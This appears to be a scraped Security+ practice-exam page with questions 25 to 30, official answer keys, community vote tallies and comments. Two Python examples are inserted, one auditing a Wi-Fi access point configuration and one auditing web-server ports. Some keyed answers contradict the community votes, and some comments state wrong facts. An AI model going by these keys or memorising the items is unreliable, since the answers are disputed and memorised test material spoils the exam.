Question #25 Topic 1

An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following
considerations would BEST support the organization's resiliency?

A. Geographic dispersal

B. Generator power

C. Fire suppression

D. Facility automation

Correct Answer: A

Community vote distribution


A (100%)

varun0 Highly Voted 5 months ago
Selected Answer: A
Placing that datacenter far away, maybe in another country, can help protect against disasters like an earthquake.
upvoted 10 times

Gravoc Highly Voted 4 months, 3 weeks ago
At least 90 miles away for natural disaster industry standard guidelines.
upvoted 6 times

DALLASCOWBOYS Most Recent 6 days, 13 hours ago
A. Geographic dispersal. Placing facilities in areas that are not going to be affected by the same disaster.
upvoted 1 times

kasper13 2 months, 3 weeks ago
Selected Answer: A
Away from natural disasters and overheating
upvoted 1 times

Question #26 Topic 1

A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the
following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?

A. EAP

B. TLS

C. HTTPS

D. AES

Correct Answer: D

Community vote distribution


D (58%) A (42%)

Gravoc Highly Voted 4 months, 3 weeks ago
EAP has to be incorrect. EAP is an AUTHENTICATION protocol, and authentication does not provide confidentiality. Authentication encompasses
processes that allows systems and networks to determine if a user is who they say they are. That provides integrity, not confidentiality.
Confidentiality ensures that secret information is protected from UNAUTHORIZED disclosure.

The question also ends with "unauthorized users".

HTTPS is just HTTP that uses TLS to encrypt network traffic that is in-transit.

As stated above, TLS encrypts in-transit data.

This question specifically states preventing exposed data to unauthorized users. TLS and HTTPS only encrypt in-transit data. Data-at-rest in a
network is insecure, though.

Only AES meets the criteria of providing confidentiality to both data-at-rest and data-in-transit, preventing unauthorized users from seeing either.
upvoted 44 times

hieptran 3 weeks, 1 day ago
AES is not commonly used for data encryption in transit.
Also, the question mentioned, "prevent unauthorized access". AES is only cryptographic and does not provide any authorization to the
network... just keep it simple
upvoted 2 times

Sir_Learnalot 2 months, 3 weeks ago
For me it is exactly the last phrase you reference here which makes me think "A". You want to prevent confidential information from leaking to
"unauthorized users", so you should make sure only authorized users have access to your wireless network. Therefore you should use EAP. I
agree on AES being the obvious choice for confidentiality, but from the wording of the question I'd go with EAP.
upvoted 5 times

adodoccletus 3 months, 3 weeks ago
You did a very good job with the explanation... kudos
upvoted 2 times

Ay_ma Highly Voted 5 months, 1 week ago
EAP- Extensible Authentication Protocol (EAP), an authentication framework that provides general guidance for authentication methods. IEEE
802.1x servers typically use one of these methods to increase the level of security during the authentication process

TLS- Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are encryption protocols that have been commonly used to encrypt data-in-
transit. For example, it is common to encrypt HTTPS with either SSL or TLS to ensure confidentiality of data transmitted over the Internet. They
can also be used to encrypt other transmissions such as File Transfer Protocol Secure (FTPS). However, TLS is now a replacement for SSL as
SSL is deprecated and shouldn't be used.

AES- Advanced Encryption Standard. A strong symmetric block cipher that encrypts data in 128-bit blocks. AES can use key sizes of 128 bits,
192 bits, or 256 bits.

HTTPS- Hypertext Transfer Protocol Secure. A protocol used to encrypt HTTP traffic. HTTPS encrypts traffic with TLS using TCP port 443.

Definitions are from Darril Gibson's Study Guide.
upvoted 19 times

pwino Most Recent 3 days, 21 hours ago
EAP (Extensible Authentication Protocol) is the correct answer because it is a secure authentication protocol commonly used in wireless
networks. EAP provides a framework for multiple authentication methods and enables the use of stronger authentication mechanisms such as
smart cards, biometrics, and certificates. By using EAP, the security engineer can ensure that only authorized users can access the network and
that confidential data is protected. EAP also provides a secure mechanism for exchanging authentication information between the client and the
authentication server. This helps prevent unauthorized access and ensures that the data transmitted over the wireless network is protected.

upvoted 1 times
I_Faisal 3 days, 21 hours ago
Selected Answer: A
Extensible Authentication Protocol (EAP)
A framework of protocols that allows for numerous methods of
authentication including passwords, digital certificates, and public key
upvoted 1 times

ronniehaang 5 days, 2 hours ago
Selected Answer: A
A. EAP (Extensible Authentication Protocol) is commonly used in wireless networks to ensure secure authentication of users and devices, and
prevent unauthorized access to the network. By using EAP, the engineer can ensure that only authorized users and devices are able to access the
network and that confidential data is not exposed to unauthorized users.
upvoted 1 times

DALLASCOWBOYS 6 days, 13 hours ago
D, AES. Advanced Encryption Standard is a widely supported encryption standard type for all wireless networks containing any confidential data.
EAP is an authentication protocol.
upvoted 1 times

zf1343 1 week ago
Question is stressing on "exposing confidential data to unauthorized users". A simple wireless PSK authentication e.g., WPA2-Personal achieves
similar privacy protection as if you would implement 802.1x with complex EAP authentication protocols. Both will take advantage of AES.
Although the latter would take advantage of TLS too if EAP-TLS was implemented.
upvoted 2 times
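The thread above argues EAP against AES as if one replaced the other; on a real access point they are set by different keys. As an added example (not from the ExamTopics page or any commenter), the Python below lints two constructed hostapd.conf snippets and reports separately what admits a client (wpa_key_mgmt: WPA-PSK vs WPA-EAP/802.1X) and what protects the frames once admitted (wpa_pairwise / rsn_pairwise: TKIP vs CCMP, the AES mode). The option names are genuine hostapd keys; the SSID, passphrase and RADIUS address are made-up values.

```python
"""Separate admission control (EAP vs PSK) from frame confidentiality (CCMP/AES vs TKIP)
in a hostapd configuration.

Added example, not code from the ExamTopics page or any commenter. The option
names below are real hostapd.conf keys; the two configs and their values
(SSID, passphrase, RADIUS address) are constructed for illustration.
"""

# Constructed: WPA1 with a shared passphrase and the TKIP cipher.
WEAK_CONF = """\
interface=wlan0
ssid=SharedOfficeWiFi
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_passphrase=Welcome123
wpa_pairwise=TKIP
"""

# Constructed: WPA2 with 802.1X/EAP admission and CCMP (AES) pairwise cipher.
HARDENED_CONF = """\
interface=wlan0
ssid=SharedOfficeWiFi
wpa=2
ieee8021x=1
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
auth_server_addr=10.0.0.5
auth_server_port=1812
auth_server_shared_secret=radius-secret-placeholder
"""


def parse_hostapd(text: str) -> dict[str, str]:
    """hostapd.conf is one key=value per line; '#' starts a comment."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf


def assess(conf: dict[str, str]) -> dict:
    """Report admission method and pairwise cipher separately, plus findings."""
    findings = []
    wpa = conf.get("wpa", "0")  # bitmask: 1 = WPA, 2 = WPA2/RSN, 3 = both
    if wpa == "0":
        findings.append("open network: no WPA/WPA2 at all")
    elif wpa == "1":
        findings.append("wpa=1 enables WPA1 only; set wpa=2 for WPA2/RSN")

    # wpa_pairwise applies to WPA1, rsn_pairwise to WPA2; either may still allow TKIP.
    ciphers = set(conf.get("wpa_pairwise", "").split()) | set(conf.get("rsn_pairwise", "").split())
    if "TKIP" in ciphers:
        findings.append("TKIP pairwise cipher allowed; require CCMP (AES)")
    if wpa != "0" and "CCMP" not in ciphers:
        findings.append("CCMP (AES) not enabled: frames are not AES-protected")

    key_mgmt = set(conf.get("wpa_key_mgmt", "").split())
    if "WPA-EAP" in key_mgmt:
        admission = "802.1X/EAP (per-user credentials via RADIUS)"
        if not conf.get("auth_server_addr"):
            findings.append("WPA-EAP set but no auth_server_addr (RADIUS) configured")
    elif "WPA-PSK" in key_mgmt:
        admission = "pre-shared key (one secret for every device)"
        findings.append("PSK: any tenant who learns the passphrase is 'authorized'")
    else:
        admission = "none"

    return {"admission": admission, "cipher": sorted(ciphers), "findings": findings}


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        report = assess(parse_hostapd(text))
        print(f"{name}: admission={report['admission']}, cipher={report['cipher']}")
        for finding in report["findings"]:
            print(f"  - {finding}")
```

The weak config produces four findings (WPA1, TKIP, no CCMP, shared passphrase) and the hardened one produces none: changing the cipher to CCMP on its own would still leave every tenant who knows the passphrase on the network, and switching to EAP on its own would still leave frames on TKIP, which is why the two settings have to be looked at independently.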

Zonas 1 week, 2 days ago
Distinguish between confidential data and confidentiality. The engineer doesn't want to expose confidential data to unauthorised users; it
doesn't mean he wants to provide confidentiality of data.

He cannot implement AES directly on wireless network, he can choose WPA3 for example if he wants AES encryption.

So, a correct answer is EAP which can prevent unauthorised users to access confidential data on the network.
upvoted 1 times

P0wned 2 weeks, 5 days ago
Selected Answer: A
Answer: A
A. EAP: Authenticates users and devices on the wireless network.
B. TLS: Encrypts data sent over networks.
C. HTTPS: encrypts data sent over the web
D. AES: encrypts data at rest or in transit.
upvoted 3 times

shover 3 weeks, 1 day ago
Authentication just proves an identity (EAP); authorization grants access to data. Just because a user is authenticated doesn't mean they are
authorized. They want the data not to be accessed by unauthorized users, either going out of the network or in their network. Encryption provided
by AES will prevent unauthorized users from accessing the data.
upvoted 2 times

P0wned 1 month ago
Selected Answer: A
1st (A. EAP) is the correct answer.
upvoted 1 times

mike47 1 month, 2 weeks ago
Selected Answer: D
What is AES wireless?
AES — The Advanced Encryption Standard (AES) encryption algorithm a widely supported encryption type for all wireless networks that contain
any confidential data. AES in Wi-Fi leverages 802.1X or PSKs to generate per station keys for all devices. AES provides a high level of security
like IP Security (IPsec) clients.
https://www.arubanetworks.com/techdocs/Instant_41_Mobile/Advanced/Content/UG_files/Authentication/UnderstandingEncryption.htm
upvoted 1 times

jhfdkjshfkjdsho 1 month, 3 weeks ago
Selected Answer: D
D is the correct answer. AES is a standard, not a security framework or protocol.
upvoted 3 times

jhfdkjshfkjdsho 1 month, 3 weeks ago
I mean A
upvoted 1 times

jhfdkjshfkjdsho 1 month, 3 weeks ago
What is the difference between EAP-TLS and AES 256 encryption?

They are not just different protocols, they are entirely different concepts.

AES - the Advanced Encryption Standard - is a block cipher algorithm. In AES-256 the 256 denotes the key size (different key sizes also trigger
slightly different variants of AES). AES can be used for the transport encryption used within TLS; i.e. it can be the cipher that actually encrypts the
payload. AES is a subset of Rijndael standardized by NIST.

EAP describes a framework for authentication. The authentication mechanisms provided by EAP-TLS can be used within the handshake of TLS
to authenticate the client and/or server. Usually it is used to perform both client and server authentication though (compared to web browsers
that usually only perform server authentication).

So we aren't comparing apples and oranges here, we're comparing apples and asparagus.
upvoted 1 times

Juraj22 2 months ago
Selected Answer: A
I think that they want access for users, not for devices and so on. Therefore I prefer EAP, because EAP is an authentication protocol for users, for
example with Active Directory or some RADIUS. As a network engineer, I prefer EAP. AES is strong, but in this context EAP is much better.
upvoted 1 times

J_Ark1 2 months ago
Selected Answer: D
Advanced Encryption Standard (AES) protects data in transit, aka Wi-Fi. TLS (translation layer secure) protects data at rest. EAP (smth smth protocol)
is an auth mechanism.
upvoted 3 times

tek7ila 2 months, 1 week ago
Selected Answer: A
"...ensure that confidential data is not exposed to unauthorized users." The last sentence makes me believe that A is the correct answer. EAP is an
authentication protocol, so it won't let unauthenticated users see data.
upvoted 3 times

Question #27 Topic 1

The Chief Compliance Officer from a bank has approved a background check policy for all new hires. Which of the following is the policy MOST
likely protecting against?

A. Preventing any current employees' siblings from working at the bank to prevent nepotism

B. Hiring an employee who has been convicted of theft to adhere to industry compliance

C. Filtering applicants who have added false information to resumes so they appear better qualified

D. Ensuring no new hires have worked at other banks that may be trying to steal customer information

Correct Answer: C

Community vote distribution


B (100%)

inkedia3 Highly Voted 5 months, 1 week ago
I think the wording is a problem if you guys are considering B. Background checks are to identify falsification and misrepresentation. The answer is C.
upvoted 14 times

Renfri 2 months ago
You think the compliance officer wants to go through the trouble of doing a background check just so they can verify your experience? Lol
upvoted 2 times

rhocale 1 month, 3 weeks ago
Speaking from experience, a background check does not verify anything on a resume.
upvoted 3 times

andrizo 3 months, 3 weeks ago
A background check would not even verify anything on your resume.
upvoted 5 times

fzorsqqmdmsvfqvqdv 1 month, 4 weeks ago
That's incorrect completely. Background checks do include employment history.
upvoted 1 times

CyberU 4 months, 1 week ago
Compliance officer would be concerned about industry compliance and hence B seems relevant.
upvoted 4 times

YusufMadkour Highly Voted 5 months, 1 week ago
Selected Answer: B
B

Source: https://www.pcicomplianceguide.org/what-does-the-pci-dss-say-about-employee-background-checks/

PCI DSS requires background checks for employees handling credit card holder data.
upvoted 13 times

DALLASCOWBOYS Most Recent 6 days, 12 hours ago
B. In the banking industry, theft is a major concern. Being convicted of theft is an automatic red flag, and denial of employment.
upvoted 2 times

Zonas 1 week, 2 days ago
The correct answer is B.
upvoted 2 times

emma234 2 weeks, 5 days ago
A background check does not check your resume, but it checks your criminal records, drug tests, etc.
I can be qualified for the job and my resume can be true, but working in a bank... the criminal history.
upvoted 2 times

Learner123_ 3 weeks ago
The answer is B
upvoted 2 times

asum 3 weeks, 2 days ago
C. A background check determines that a person is who they say they are and are not concealing criminal activity, bankruptcy, or connections that
would make them unsuitable or risky. Employees working in high confidentiality environments or with access to high value transactions will
obviously need to be subjected to a greater degree of scrutiny. For some jobs, especially federal jobs requiring a security clearance, background
checks are mandatory. Some background checks are performed internally, whereas others are done by an external third party.
upvoted 1 times
asum 3 weeks, 2 days ago
As the CompTIA guide says: A background check determines that a person is who they say they are and are not concealing criminal activity,
bankruptcy, or connections that would make them unsuitable or risky. Employees working in high confidentiality environments or with access to
high value transactions will obviously need to be subjected to a greater degree of scrutiny. For some jobs, especially federal jobs requiring a
security clearance, background checks are mandatory. Some background checks are performed internally, whereas others are done by an external
third party.
upvoted 2 times

batuhanzeyad 4 weeks ago
Selected Answer: B
The right answer is B, of course.
upvoted 1 times

bengy78 2 months, 3 weeks ago
A background check does not mean only criminal, it can also be credit and other aspects. Per Comptia Certmaster "A background check
determines that a person is who they say they are and are not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky."
upvoted 4 times

bengy78 2 months, 3 weeks ago
The answer is B. I've worked in the credit card industry under PCI DSS and the thing that got the most people fired or prevented from being hired
was poor credit scores and bankruptcy. Criminal background checks are a given, the banking industry is most concerned with how you handle
money.
upvoted 2 times

rodwave 2 months, 3 weeks ago
Selected Answer: B
Answer: Hiring an employee who has been convicted of theft to adhere to industry compliance - As this is a compliance officer, they would likely
need to be concerned with complying with industry regulations regarding the employees they hire. For example, PCI DSS requires background
checks for employees handling credit card information.

Background checks generally only allow employers to view criminal and court records, so it could be helpful for an employer to know if a
candidate has a record for theft with a background check when determining employment.
upvoted 2 times

Bench300 3 months, 1 week ago
According to Exam-Labs Premium, C is the correct answer. Despite being counterintuitive.
upvoted 2 times

HaSeongKim 3 months, 2 weeks ago
Answer is B.
Maybe the Human Resources team might be checking for false info on a resume, but from a Chief Compliance Officer's point of view, they will check for
a criminal record. I don't think a Chief Compliance Officer will even look at one's resume, but will conduct or request a background check with name,
DOB, POB, gender, SSN, and fingerprint; this information is not on resumes.
upvoted 1 times

Libraboy 3 months, 2 weeks ago
Selected Answer: B
In general, background checks for employment typically cover seven years of criminal and court records, but may go back further depending on
federal and state laws and what is being searched.
What is the background verification process in HR?
Background verification is a process many organizations carry out in order to verify the information provided by the candidate during hiring. It
involves various checks in which the employer will go through your education records, past employer details, identity checks, resume checks and
address checks.
upvoted 2 times

TEKE 3 months, 3 weeks ago
The answer is C.
upvoted 1 times

CyberU 4 months, 1 week ago
Selected Answer: B
Compliance officer would be concerned about industry compliance and hence B seems relevant.
upvoted 1 times

Question #28 Topic 1

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should
be disabled.
Which of the following can be used to accomplish this task?

A. Application allow list

B. SWG

C. Host-based firewall

D. VPN

Correct Answer: B

Community vote distribution


C (62%) B (37%)

YusufMadkour Highly Voted 5 months, 1 week ago
Selected Answer: C
Not A or D.
Was not sure whether it should be B or C until I read the definition of SWGs in the official guide from CompTIA.

"An on-premises SWG is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet
sites and services"
upvoted 20 times

NICKJONRIPPER 2 months, 2 weeks ago
So it must be B; same result, but you cannot configure 100 host-based firewalls as in C.
upvoted 2 times

shitgod 1 month, 2 weeks ago
Why not? It's so common and easy with cloud orchestration tools.
upvoted 2 times

Mondicles Highly Voted 4 months, 2 weeks ago
Selected Answer: C
This one asks which one is used for port blocking in WEB SERVERS.
SWG is primarily used to protect USERS from accessing or being infected by web threats.
I'll go with firewalls to explicitly allow 443.
upvoted 11 times

OnA_Mule Most Recent 1 day, 16 hours ago
Selected Answer: A
An application allow list is a security measure used to specify which applications and protocols are allowed to run on a network. By using an
application allow list, an engineer can restrict the web servers to only allow port 443 (HTTPS), as per the security policy, and block all other ports,
ensuring that confidential data is not exposed to unauthorized users. The other options listed (SWG, host-based firewall, and VPN) may provide
additional security measures but would not directly accomplish the task of disabling all web-server ports except 443.
upvoted 1 times

ronniehaang 5 days, 1 hour ago
Selected Answer: C
C. Host-based firewall
upvoted 1 times

DALLASCOWBOYS 6 days, 12 hours ago
B. Secure web gateways monitor web requests and ensure they are consistent with organization strategy and policy. SWG picks up where the
VPN drops off. The question states to be consistent with company policy. The SWG blocks requests that run afoul of the requirements of the
security policy.
upvoted 1 times

DuoIsAlive 1 week ago
Selected Answer: C
A. Application allow list or C. Host-based firewall

An application allow list can be used to specify which ports are open and which are closed on each server, allowing the engineer to close all ports
except 443 on the web servers. A host-based firewall is also a software or hardware solution that can be used to control incoming and outgoing
network traffic on a per-server basis, and can be used to configure the servers to only allow traffic on port 443.
upvoted 1 times

EricShon 1 week, 5 days ago
Selected Answer: C
C. Host-based firewall.

A host-based firewall is software that runs on a specific host and controls incoming and outgoing network traffic based on predefined rules. In
this case, the engineer could use a host-based firewall to block all ports except 443 on the web servers, effectively disabling all ports except for
the one used for HTTPS traffic.

A. Application allow list is a security feature that allows access to specific applications or services on a network.
B. SWG is Secure Web Gateway, a security solution that controls access to websites and web applications by blocking unauthorized users from
accessing restricted web pages.
D. VPN is a Virtual Private Network, it creates a secure, encrypted connection between two networks or between an individual user and a
network.
upvoted 1 times
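Whichever answer the exam wants, the engineering task in the question is two-fold: enforce "only 443" on every host and verify that nothing else is listening across the fleet. As an added example (not from the ExamTopics page or any commenter), the Python below parses `ss -Hltn` output collected from each server (the sample output and hostnames are constructed here; in practice it would come over SSH or the cloud provider's run-command tooling), reports any listener outside policy, and emits the nftables ruleset a host-based firewall would load. The ruleset syntax is standard nftables; nothing else is vendor-specific.

```python
"""Fleet audit for the "only port 443" web-server policy, plus the host
firewall ruleset that enforces it.

Added example, not code from the ExamTopics page or any commenter.
Assumptions: each host's listening sockets are available as `ss -Hltn`
output (SAMPLE_SS below is constructed) and the hosts run nftables.
Hostnames are hypothetical.
"""
import re

# Constructed `ss -Hltn` output for three hypothetical hosts; web-03 breaks policy.
SAMPLE_SS = {
    "web-01": "LISTEN 0 4096 0.0.0.0:443 0.0.0.0:*\n"
              "LISTEN 0 4096 [::]:443 [::]:*\n",
    "web-02": "LISTEN 0 4096 0.0.0.0:443 0.0.0.0:*\n",
    "web-03": "LISTEN 0 4096 0.0.0.0:443 0.0.0.0:*\n"
              "LISTEN 0 128 0.0.0.0:22 0.0.0.0:*\n"
              "LISTEN 0 511 0.0.0.0:80 0.0.0.0:*\n"
              "LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*\n",
}

LOOPBACK = {"127.0.0.1", "[::1]"}
# State Recv-Q Send-Q Local:Port Peer:Port (ss -Hltn drops the header row)
_SS_LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+")


def listening_ports(ss_output: str) -> dict[int, set[str]]:
    """Map each listening TCP port to the local addresses bound to it."""
    ports: dict[int, set[str]] = {}
    for line in ss_output.splitlines():
        m = _SS_LINE.match(line)
        if m:
            ports.setdefault(int(m.group(2)), set()).add(m.group(1))
    return ports


def audit_host(ss_output: str, allowed=frozenset({443})) -> list[tuple[int, bool]]:
    """Return (port, externally_reachable) for every listener outside policy.

    Loopback-only listeners are still reported: the ruleset below accepts
    traffic on lo, so they stay reachable to local processes and need a
    separate decision (disable the service or accept the finding).
    """
    findings = []
    for port, addrs in sorted(listening_ports(ss_output).items()):
        if port not in allowed:
            findings.append((port, not addrs <= LOOPBACK))
    return findings


def audit_fleet(fleet: dict[str, str], allowed=frozenset({443})) -> dict[str, list]:
    """Only the hosts with findings, so the report stays readable at 100 servers."""
    results = {host: audit_host(out, allowed) for host, out in fleet.items()}
    return {host: f for host, f in results.items() if f}


def build_nft_ruleset(allowed_tcp_ports=(443,)) -> str:
    """nftables input chain: default drop, keep replies and loopback, open only the listed ports."""
    ports = ", ".join(str(p) for p in allowed_tcp_ports)
    return (
        "table inet webfw {\n"
        "  chain input {\n"
        "    type filter hook input priority 0; policy drop;\n"
        "    iif lo accept\n"
        "    ct state established,related accept\n"
        "    ct state invalid drop\n"
        "    ip protocol icmp accept\n"
        "    ip6 nexthdr icmpv6 accept\n"
        f"    tcp dport {{ {ports} }} accept\n"
        "  }\n"
        "}\n"
    )


if __name__ == "__main__":
    for host, findings in audit_fleet(SAMPLE_SS).items():
        for port, reachable in findings:
            scope = "externally reachable" if reachable else "loopback only"
            print(f"{host}: port {port} listening ({scope})")
    print(build_nft_ruleset())
```

Two practical caveats: the ruleset drops inbound SSH, so push it through configuration management or the provider's run-command channel and keep console access, or add a rule for the management network before loading it; and the audit is worth running after the rules are in place as well, since a firewall hides a stray listener from the network but does not stop the service from running.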

Deeppain90 1 week, 6 days ago
Selected Answer: B
Not C. C is a host-based firewall installed on a PC; it's not a global firewall, so it must be SWG.
upvoted 1 times

P0wned 2 weeks, 5 days ago
Selected Answer: C
A. Application allow list: Allows or denies access to specific apps.
B. SWG: Blocks malicious web traffic.
C. Host-based firewall: Controls network access to a host.
D. VPN: Connects remote users to a private network.
upvoted 2 times

asum 3 weeks, 2 days ago
B. SWG scans transactions on the standard ports indicated below, as long as the appropriate modules are activated
upvoted 1 times

KingDrew 3 weeks, 3 days ago
Selected Answer: B
Key words: "A host-based firewall is a piece of firewall software that runs on an individual computer or device connected to a network."

In this case, we are configuring settings for 100 web servers, not one computer
SWG works best for an entire network of servers.
upvoted 3 times

viksap 1 month, 2 weeks ago
Selected Answer: B
I'm taking "cloud" as the key word, which makes SWG the better choice.
upvoted 2 times

mike47 1 month, 2 weeks ago
Selected Answer: B
A secure web gateway is an on-premise or cloud-delivered network security service.
https://www.checkpoint.com/cyber-hub/network-security/what-is-secure-web-gateway/
upvoted 3 times

Feline 1 month, 3 weeks ago
One of the components of SWG is to enforce security policy and host based firewalls enforce rules. Considering this, the best answer would be
SWG.
upvoted 3 times

tek7ila 1 month, 4 weeks ago
Here https://digital.com/best-web-hosting/what-is-a-secure-web-gateway/ You can read that SWG allows you to filter network connections by
TCP ports.

With C, the problem is the number of web servers: too many for an admin to configure. I don't think the number of servers in the question being
100 is an accident.
upvoted 1 times

Renfri 2 months ago
Selected Answer: B
It's B. Definitely not C, just because it has "FIREWALL" on its name doesn't mean it's the right answer.
upvoted 2 times

Blazingfire 2 months ago
Selected Answer: B
SWG : A secure web gateway is an on-premise or cloud-delivered network security service. Sitting between users and the Internet, secure web
gateways provide advanced network protection by inspecting web requests against company policy to ensure malicious applications and
websites are blocked and inaccessible

A host-based firewall would have to be configured on all 100 servers, which is not feasible.
upvoted 2 times
Question #29 Topic 1

A technician was dispatched to complete repairs on a server in a data center. While locating the server, the technician entered a restricted area
without authorization. Which of the following security controls would BEST prevent this in the future?

A. Use appropriate signage to mark all areas.

B. Utilize cameras monitored by guards.

C. Implement access control vestibules.

D. Enforce escorts to monitor all visitors.

Correct Answer: B

Community vote distribution: C (100%)

Mamun1 Highly Voted 5 months, 1 week ago
Selected Answer: C
How would the guard know every individual and their access rights?
The access control vestibule (AKA Mantrap) seems to be more appropriate to me.
upvoted 14 times

rhocale 1 month, 4 weeks ago
It wouldn't stop them, just inform them.
upvoted 1 times

ronniehaang Most Recent 5 days, 1 hour ago
Selected Answer: C
C. Implement access control vestibules or mantrap, security mantrap portal, airlock, sally port is a physical security access control system
comprising a small space with two sets of interlocking doors, such that the first set of doors must close before the second set opens.
upvoted 1 times

DALLASCOWBOYS 6 days, 11 hours ago
C. access control vestibule is the BEST answer, as access control vestibules control access to the most secured, valuable areas of a facility. D is
also a good answer as security guards should know which areas are restricted. A & B are only deterrent controls.
upvoted 1 times

Samsonite363 1 week, 5 days ago
Selected Answer: C
This is so obvious.
upvoted 1 times

xxxdolorxxx 2 weeks ago
Selected Answer: C
Why not C?
"Implement access control vestibules"
Wouldn't access control to a vestibule prevent someone from entering a restricted area?
upvoted 1 times

asum 3 weeks, 2 days ago
B. I think B can be a choice. A guard can see on camera if someone is entering a restricted area and prevent access immediately.
upvoted 1 times

Zigster 3 weeks, 2 days ago
Selected Answer: C
Mantrap
upvoted 1 times

nukimoya 2 months ago
why is no one saying A?
upvoted 4 times

560exam 2 months ago
The question says "Best Prevent" in the future. You can add signs that says restricted area (option A) but that's not going to prevent someone
from getting in those areas. I agree with C.
upvoted 2 times

nischal123 2 months, 3 weeks ago
C makes the most sense. Cameras help with monitoring, but they do not prevent it from happening.
upvoted 2 times

rodwave 2 months, 3 weeks ago
Selected Answer: C
Answer: Implement access control vestibules

An access control vestibule, or mantrap, is a physical access control system designed to prevent unauthorized individuals from following
authorized individuals into facilities with controlled access. This question is asking for a way to prevent physical access to restricted area and this
method would address this.
upvoted 2 times

carpathia 2 months, 4 weeks ago
Selected Answer: C
Keyword "prevent" - preventative controls: mantrap etc.
upvoted 1 times

Sklark 3 months, 2 weeks ago
Guards can be social engineered. Answer is C
upvoted 1 times

CyberU 4 months, 1 week ago
Selected Answer: C
access control mechanism
upvoted 1 times

Gravoc 4 months, 3 weeks ago
C makes the most sense. All other options get overly complex too quickly, when a man trap is the simplest. It's a physical barrier that can be
socially engineered, or requiring constant surveillance.
upvoted 1 times

Joe1984 5 months ago
I agree with C, but an escort would ensure you only went to the correct place without wandering.
upvoted 3 times

TBLaxen 5 months ago
Selected Answer: C
Just because there's a camera doesn't prevent the technician from entering the restricted area. Answer must be C.
upvoted 2 times

comeragh 5 months ago
Selected Answer: C
Answer should be C here. Access control vestibule (mantrap).
upvoted 1 times
Question #30 Topic 1

Which of the following would BEST provide a systems administrator with the ability to more efficiently identify systems and manage permissions
and policies based on location, role, and service level?

A. Standard naming conventions

B. Domain services

C. Baseline configurations

D. Diagrams

Correct Answer: B

Community vote distribution: A (74%) B (26%)

yoloson Highly Voted 5 months, 1 week ago
Selected Answer: A
Quoting from the official guide below.
A standard naming convention for hardware assets, and for digital assets such as accounts and virtual machines, makes the environment more
consistent. This means that errors are easier to spot and that it is easier to automate through scripting. The naming strategy should allow
administrators to identify the type and function of any particular resource or location at any point in the CMDB or network directory. Each label
should conform to rules for host and DNS names.
upvoted 21 times

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: A
Answer: Standard naming conventions

These are naming frameworks used for naming hardware assets, and for digital assets such as accounts and virtual machines in a consistent
way. The naming strategy should allow administrators to identify the type and function of any particular resource or location at any point.
=============================
Helpful Info:
Domain Services - Services that stores centralized directory information and lets users and domains communicate. When a user attempts to
connect to a device or resource on a network, this service provides login authentication, verifying the user's login credentials and access
permissions.

Baseline configuration - A documented set of specifications for an information system, or a configuration item within a system, that has been
formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures.
upvoted 8 times

OnA_Mule Most Recent 1 day, 16 hours ago
Selected Answer: B
Read the question. A naming convention wouldn't help "and manage permissions and policies based on location, role, and service level." The
only item in the list that would help with this part of the question is Domain Services.
Proper naming convention will help to identify the host, but it won't help with the management of that host better than a domain service, like
Active Directory
upvoted 1 times

ronniehaang 5 days, 1 hour ago
Selected Answer: B
B. Domain services

Domain services are used in the administration of computer networks to centralize management and control of resources and security. For
example, Active Directory (AD) is a domain service that provides a centralized and organized approach to managing users, computers, groups,
and other resources in a network. It enables the administrator to assign permissions and policies based on location, role, and service level, and
to manage these policies from a central location, reducing the administrative workload and improving security. For instance, an administrator can
assign permissions for access to specific systems or applications based on the role of the user, such as developers, sales, or support personnel,
and can enforce these permissions regardless of the user's physical location.
upvoted 1 times

DALLASCOWBOYS 6 days, 11 hours ago
A. Standard naming conventions can assist with locating files.
upvoted 1 times

DuoIsAlive 1 week ago
Selected Answer: B
B. Domain services

Domain services, such as Active Directory, provide centralized management and control of user accounts, computers, and other resources on a
network. These services allow the administrator to create and manage user and computer accounts, assign permissions and policies, and control
access to resources based on location, role, and service level. They also allow for efficient identification of systems and management of
permissions and policies, which is what the question is asking for.

Standard naming conventions, Baseline configurations, and Diagrams can also provide useful information for system administrators, but they
would not offer the same level of centralized management and control as domain services.
upvoted 1 times

EricShon 1 week, 5 days ago
B. Domain services.

Domain services, such as Active Directory, provide a centralized way for a systems administrator to manage user and device identities,
permissions and access controls, and group policies. This allows the administrator to more efficiently identify systems based on location, role,
and service level, and apply appropriate policies and permissions.

A. Standard naming conventions are a way to organize and identify systems based on a consistent naming scheme, but they don't provide the
ability to manage permissions and policies based on location, role, and service level.
C. Baseline configurations are a way to establish standard configurations for systems, but they don't provide the ability to manage permissions
and policies based on location, role, and service level.
D. Diagrams are a way to visually represent the architecture of a network, but they don't provide the ability to manage permissions and policies
based on location, role, and service level.
upvoted 2 times

sanlibo 2 weeks, 2 days ago
Selected Answer: A
As a former NOC, we can identify the device functions, applications and prod/non-prod environment via naming conventions.
upvoted 1 times

asum 3 weeks, 2 days ago
Selected Answer: A
A. As the CompTIA guide mentions: A standard naming convention for hardware assets, and for digital assets such as accounts and virtual machines, makes the environment more consistent. This means that errors are easier to spot and that it is easier to automate through scripting. The naming strategy should allow administrators to identify the type and function of any particular resource or location at any point in the CMDB or network directory. Each label should conform to rules for host and DNS names (support.microsoft.com/en-us/help/909264/naming-conventions-in-active-directory-for-computers-domains-sites and). As well as an ID attribute, the location and function of tangible and digital assets can be recorded using attribute tags and fields or DNS CNAME and TXT resource records.
upvoted 1 times

Mr_BuCk3th34D 1 month, 1 week ago
Selected Answer: B
B. Domain services would provide a systems administrator with the ability to more efficiently identify systems and manage permissions and
